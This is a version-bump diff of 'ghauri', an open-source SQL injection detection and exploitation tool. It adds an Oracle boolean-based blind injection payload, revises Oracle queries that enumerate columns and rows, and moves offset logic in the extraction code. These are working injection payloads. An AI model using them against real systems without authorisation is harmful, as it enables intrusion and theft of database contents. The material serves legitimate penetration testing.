STRLCPY/ghauri

■ ■ ■ ■ ■ ■

README.md

1		-	[![GitHub release](https://img.shields.io/badge/release-v1.1.5-brightgreen?style=flat-square)](https://github.com/r0oth3x49/ghauri/releases/tag/1.1.5)
	1	+	[![GitHub release](https://img.shields.io/badge/release-v1.1.6-brightgreen?style=flat-square)](https://github.com/r0oth3x49/ghauri/releases/tag/1.1.6)
2	2		[![GitHub stars](https://img.shields.io/github/stars/r0oth3x49/ghauri?style=flat-square)](https://github.com/r0oth3x49/ghauri/stargazers)
3	3		[![GitHub forks](https://img.shields.io/github/forks/r0oth3x49/ghauri?style=flat-square)](https://github.com/r0oth3x49/ghauri/network)
4	4		[![GitHub issues](https://img.shields.io/github/issues/r0oth3x49/ghauri?style=flat-square)](https://github.com/r0oth3x49/ghauri/issues)
		skipped 157 lines

■ ■ ■ ■ ■ ■

ghauri/__init__.py

		skipped 23 lines
24	24
25	25		"""
26	26
27		-	__version__ = "1.1.5"
	27	+	__version__ = "1.1.6"
28	28		__author__ = "Nasir Khan (r0ot h3x49)"
29	29		__license__ = "MIT"
30	30		__copyright__ = "Copyright (c) 2016-2025 Nasir Khan (r0ot h3x49)"
		skipped 2 lines

■ ■ ■ ■ ■ ■

ghauri/common/payloads.py

		skipped 1601 lines
1602	1602		"Oracle": {
1603	1603		"boolean-based": [
1604	1604		{
	1605	+	"payload": "(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 01234 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)",
	1606	+	"comments": [
	1607	+	{"pref": "", "suf": ""},
	1608	+	],
	1609	+	"title": "Oracle boolean-based blind - Parameter replace",
	1610	+	"vector": "(SELECT (CASE WHEN ([INFERENCE]) THEN 01234 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)",
	1611	+	"dbms": "",
	1612	+	},
	1613	+	{
1605	1614		"payload": "AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,0568) END) FROM DUAL) IS NULL",
1606	1615		"comments": [
1607	1616		{"pref": " ", "suf": "--"},
		skipped 396 lines
2004	2013		"(SELECT TOP 1 name FROM {db}..syscolumns WHERE 1=1)",
2005	2014		],
2006	2015		"Oracle": [
2007		-	"(SELECT COLUMN_NAME FROM SYS.ALL_TAB_COLUMNS WHERE OWNER={db} AND TABLE_NAME={tbl})"
	2016	+	"(SELECT COLUMN_NAME FROM (SELECT COLUMN_NAME,ROWNUM AS LIMIT FROM SYS.ALL_TAB_COLUMNS WHERE OWNER={db} AND TABLE_NAME={tbl}) WHERE LIMIT=1)",
2008	2017		],
2009	2018		}
2010	2019
		skipped 42 lines
2053	2062		"(SELECT TOP 1 {col} FROM {tbl} WHERE 1=1)",
2054	2063		],
2055	2064		"Oracle": [
2056		-	"(SELECT {col} FROM (SELECT qq.*,ROWNUM AS LIMIT FROM {tbl} qq ORDER BY ROWNUM) WHERE LIMIT=1)"
	2065	+	"(SELECT {col} FROM (SELECT {col},ROWNUM AS LIMIT FROM {tbl} {col} ORDER BY ROWNUM) WHERE LIMIT=1)"
	2066	+	"(SELECT {col} FROM (SELECT {col},ROWNUM AS LIMIT FROM {tbl}) WHERE LIMIT=1)",
	2067	+	"(SELECT {col} FROM (SELECT qq.*,ROWNUM AS LIMIT FROM {tbl} qq ORDER BY ROWNUM) WHERE LIMIT=1)",
2057	2068		],
2058	2069		}
2059	2070
		skipped 5 lines

■ ■ ■ ■ ■ ■

ghauri/extractor/advance.py

		skipped 129 lines
130	130		if start != 0 and start > 0:
131	131		if backend != "Oracle":
132	132		start = start - 1
133		-	if start == 0 and backend == "Oracle":
134		-	start = 1
135	133		logger.info("fetching database names")
136	134		Response = collections.namedtuple(
137	135		"Response",
		skipped 183 lines
321	319		and "DB_NAME" in payload
322	320		):
323	321		stop = stop + 1
	322	+	if start == 0 and backend == "Oracle":
	323	+	start = 1 if start == 0 else start
	324	+	stop = total + 1 if stop == total else stop + 1
324	325		while start < stop:
325	326		payloads = prepare_query_payload(
326	327		backend=backend, offset=start, payload_string=payload
		skipped 77 lines
404	405		if start != 0 and start > 0:
405	406		if backend != "Oracle":
406	407		start = start - 1
407		-	if start == 0 and backend == "Oracle":
408		-	start = 1
409	408		logger.info(f"fetching tables for database: {database}")
410	409		Response = collections.namedtuple(
411	410		"Response",
		skipped 94 lines
506	505		)
507	506		return _temp
508	507		payload = clean_up_offset_payload(payload, backend=backend)
	508	+	if start == 0 and backend == "Oracle":
	509	+	start = 1 if start == 0 else start
	510	+	stop = total + 1 if stop == total else stop + 1
509	511		while start < stop:
510	512		payloads = prepare_query_payload(
511	513		backend=backend, offset=start, payload_string=payload
		skipped 81 lines
593	595		if start != 0 and start > 0:
594	596		if backend != "Oracle":
595	597		start = start - 1
596		-	if start == 0 and backend == "Oracle":
597		-	start = 1
598	598		logger.info(
599	599		f"fetching columns for table '{mc}{table}{bw}' in database '{mc}{database}{bw}'"
600	600		)
		skipped 97 lines
698	698		)
699	699		return _temp
700	700		payload = clean_up_offset_payload(payload, backend=backend)
	701	+	if start == 0 and backend == "Oracle":
	702	+	start = 1 if start == 0 else start
	703	+	stop = total + 1 if stop == total else stop + 1
701	704		while start < stop:
702	705		payloads = prepare_query_payload(
703	706		backend=backend, offset=start, payload_string=payload
		skipped 301 lines

■ ■ ■ ■ ■ ■

setup.py

		skipped 4 lines
5	5
6	6		setup(
7	7		name="ghauri",
8		-	version="1.1.5",
	8	+	version="1.1.6",
9	9		description="An advanced SQL injection detection & exploitation tool.",
10	10		classifiers=["Programming Language :: Python3"],
11	11		author="Nasir Khan",
		skipped 28 lines

updated code quality, fixed issue with Oracle column retrieval query..